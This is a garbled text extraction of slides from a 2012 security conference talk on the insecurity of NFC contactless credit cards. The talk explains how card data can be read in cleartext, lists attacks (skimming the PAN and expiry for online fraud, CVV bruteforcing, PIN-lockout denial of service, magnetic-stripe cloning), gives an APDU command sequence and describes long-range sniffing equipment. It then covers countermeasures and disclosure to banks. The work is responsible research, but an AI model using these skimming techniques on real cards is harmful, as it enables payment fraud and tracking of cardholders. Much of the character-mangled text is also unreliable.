Professional Documents
Culture Documents
HES 2012 Rlifchitz Contactless Payments Insecurity
HES 2012 Rlifchitz Contactless Payments Insecurity
S"eaker/' bio
&enetration te'ting 5 'ecurit0 audit' Securit0 training' Securit0 re'earch Securit0 of "rotocol' 6authentication# cr0"togra"h0# information leakage# zero7kno1ledge "roof'...*umber theor0 6integer factorization# "rimalit0 te'ting# elli"tic cur3e'...)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
2ain intere't'4
E3er0da0 "a0ment 1ith no need for card in'ertion nor card &:* code 2ain '0'tem'4 ;:S! "a08a3e 5 2a'ter+ard &a0&a'' Small "a0ment' 6for in'tance % time' 20< in a ro100#000 "a0ment terminal' in (rance 0 million' *(+7enabled credit card' in the =.S.
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
!chie3e fa'ter?'im"ler?ea'ier "a0ment' 2ake "eo"le bu0 more 62a'ter+ard +anada ha' 'een )about 2> "ercent. higher '"ending b0 it' &a0&a'' u'er':ntero"erable '0'tem'
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
>
Aata 'torage and 'ecurit04 E2; 'tandard' 6Euro"a0 2a'ter+ard and ;:S!&rotocol command' and card' 'torage la0out4 :SB CD @ 'tandard'
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
E2;
+ard memor04 a real file'0'tem 1ith a root director0 62(-# folder' 6A(- and file' 6E(- identified b0 2 b0te'# according to :SB CD @7%
Aata encoding4 BER TL; 63er0 near from !S*. - E online decoder4 htt"4??111.em3lab.org?tl3util'?
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
:SB CD @7%
+la'' 6 b0te:n'truction 6 b0te&arameter Aata field Length of eG"ected re'"on'e 6 b0te5 2 6 b0te eachLength of data 6 b0te-
!n'1er'4
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
The idea
(rench *a3igo contactle'' tran'"ortation card' al'o u'e :SB CD @ enca"'ulation o3er R(:A but4
*o "er'onal data on card 6card :A I cardholder :A='e good encr0"tion ='e good authentication ='e digital 'ignature ='e encr0"tion ='e a combined reading to a3oid rogue acce'' 6o"ticalJR(:A-
R(:A "a''"ort'4
E R(:A credit card' 6K mone0- 'hould be a' 'ecure a' tho'e t1o# 'houldn/t them9
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
*(+
Aifferent name' for nearl0 the 'ame thing4 R(:A?*(+?+it0zi H( 6 $#>@ 2hz- 5 L( 6 2>7 $% kHz- u'age' 2o't common H( "rotocol4 :SB %%%$ 6:SB %%%$7 to :SB %%%$7%+an be u'ed for tunneling?enca"'ulation
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
*(+ reader'
=SB reader'4
S+2 S+L$C
6%0< dongle-
!+S !+R 20=?!+R 22= 6flatSam'ung *eGu' S# Sam'ung LalaG0 *eGu' BlackBerr0 Bold HH00?HH$0# BlackBerr0 +ur3e H$>0?H$@0?H$C0 *okia *H?+C?@0$
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
&hone'4
Tool'
:SB CD @ 6contact- "rotot0"ing4 scriptor *(+ 6contactle''- "rotot0"ing4 libnfc pn53x-tamashell (inal coding4 libnfc 6EB(# SB( and +R+ are automagicall0 handled-
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
+onfirmed4
+ardholder4 gender# fir't name and la't name &!* 6&rimar0 !ccount *umberEG"iration date 2agnetic 'tri"e data Tran'action hi'tor0
&robabl04 general card information 6i''uer# "ublic ke0'# MBut no +;;N 6Ou't a one7time7+;; functionalit0)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
&o''ible attack'
Read 3ictim/' card data and u'e it on e7 commerce 1eb'ite'4 +;; i' not al1a0' mandator0 and +;; can be bruteforced 6onl0 000 "o''ibilitie'...Remote card AoS9 6'end $ time' a bad &:* code+reate a magnetic 'tri"e dum" remotel0 6card clone 1ill be u'eful 1here chi" card?&:* i' not mandator04 mo't E= countrie'# =S!# M='er identification and tracking 6terrori'm...)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
>
4A 01 00 40 01 00 A4 04 00 07 A0 00 00 00 42 10 10 00 40 01 00 B2 02 0C 00 00
!:A 'election
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
&roof of +once"t
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
20
!ttack limitation'
!cti3e read u" to $ to >cm in "ractice !cti3e read u" to .>m 6>0G betterN- u'ing a dedicated am"lifier 62000<- and antenna 6 000<-. E3er0thing fit' into a back"ack... &a''i3e 'niffing u" to >m 6>00G betterN- u'ing a radio recei3er 6e.g. =SR&- 1ith a 'tandard tele'co"ic antenna
Remember4 in !ugu't 200%# hacker' 'ucceeded in eGtending a Bluetooth dongle range from 0m to #CkmN 6htt"4??trifinite.org?trifiniteP'tuffPld'.html)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
&a''i3e 'niffing
Reader probes, commun ca! on " !# !#e cred ! card, and !#en probes a$a n
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
22
Ho1 to "rotect9
OR
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
2$
+ontactle'' acce''e' 'hould be authenticated to a3oid rogue reader' +ontactle'' "rotocol 'hould be encr0"ted to a3oid ea3e'dro""ing Se''ion integrit0 'hould be en'ured 6e.g. H2!+to a3oid inOection Thi' alread0 eGi't'NNN 6for eGam"le (rench *a3igo tran'"ortation cardConc%us on4 E2; i' "oorl0 de'igned for *(+ and need' a com"lete re1riteN...
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
2%
Regulator0 com"liance
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
2>
:ntended for or$an &a! ons !#a! #and%e card#o%der n'orma! on 6merchant'# financial in'titution'# 'oft1are 5 hard1are de3elo"er'# indu'tr0 "rofe''ional'...)&+: Aata Securit0 Standard. is a multifaceted security standard that includes requirements for security management, policies, procedures, network architecture, software design and other critical protective measures. This comprehensive standard is intended to help organizations proactively protect customer account data. 6 htt"'4??111."ci'ecurit0'tandard'.org&+: ASS i' '"on'ored b0 the 'ame 1ho ha3e de'igned and di'tributed *(+ credit card' 6;i'a# 2a'ter+ard# ...- in order to a3oid fraud
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
2@
ReFuirement % of &+: ASS 7 QEncr0"t tran'mi''ion of cardholder data acro'' o"en# "ublic net1ork'Q4
Sco"e4 all 1irele'' technologie' Te'ting &rocedure %. .a4 )Select a 'am"le of tran'action' a' the0 are recei3ed and ob'er3e tran'action' a' the0 occur to 3erif0 that cardholder data i' encr0"ted during tran'it..
=n'olicited acce''e' and mo't 'olicited acce''e' to the credit card' are +LE!RTERT !*A :*+L=AE +!RAHBLAER A!T! Thi' i' a 2!SBR (!:LN *(+ "a0ment' are not com"liant 1ith &+: ASS and organization' can become non7com"liant b0 acce"ting them...
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
2C
Ho1e3er# one of the 2 bigge't credit card 'u""lier 'tate' in it' "ublic (!T that )technicall0# the contactle'' functionalit0 6...- "rotect' cardholder information u'ing (er) secured d)nam c cr)p!o$rams. :ndeed# it/' clearteGtNNN
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
2D
:n (rance# it i' a criminal offen'e not to "rotect "er'onal data 1hen 0ou handle them Uou al'o ha3e to com"l0 1ith E= regulator0 con'traint' on "er'onal data "rotection +*:L# a (rench "ublic organization i' re'"on'ible to re"ort offen'e' That/' 1h0 credit card 'u""lier' "robabl0 don/t com"l0 1ith (rench la1 tooN...
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
2H
Timeline of di'co3er0
Aecember 2nd# 20
4 20 di'co3er0
: notif0 m0 "er'onal bank during the follo1ing 1eek. The0 thanked for the 'te" but 'ince : ha3e no ne1' Sanuar0 $0# 20 24 Vri'tin &aget 'ho1' 'omething Fuite 'imilar at Shmoocon# u'ing dedicated commercial hard1are ! bit later# (rench L:E +B officiall0 'tate' that the0 are a1are of ri'k' 1ith *(+ credit card' !"ril $# 20 24 : notif0 'ome other bank'# the (rench 2ini'tr0 of (inance and the +*:L during a 'hort demo 6LS Aa0' 20 2# &ari':n3e'tigation' are currentl0 being made b0 the'e organization' and la1 enforcement
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
$0
Thi' i' *BT re3er'e engineering4 E2; 'tandard i' a3ailable to e3er0bod0 for a long time. The "roof of conce"t i' Ou't a 'mall E2; im"lementation Thi' i' *BT made for counterfeit'4 8e ha3e Ou't eGtracted "er'onal information that alread0 belong' to u'# and thi' i' neither not nece''ar0 nor 'ufficient for counterfeit' 8e H!;E*/T BRBVE* an0 'ecurit0 or tried to# becau'e there i' noneN
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
Thank'N
!n0 Fue'tion'9
)Hacking the *(+ credit card' for fun and debit ,-. Renaud Lifchitz BT Hackito Ergo Sum 20 2 !"ril 2# $# % &ari'# (rance
$2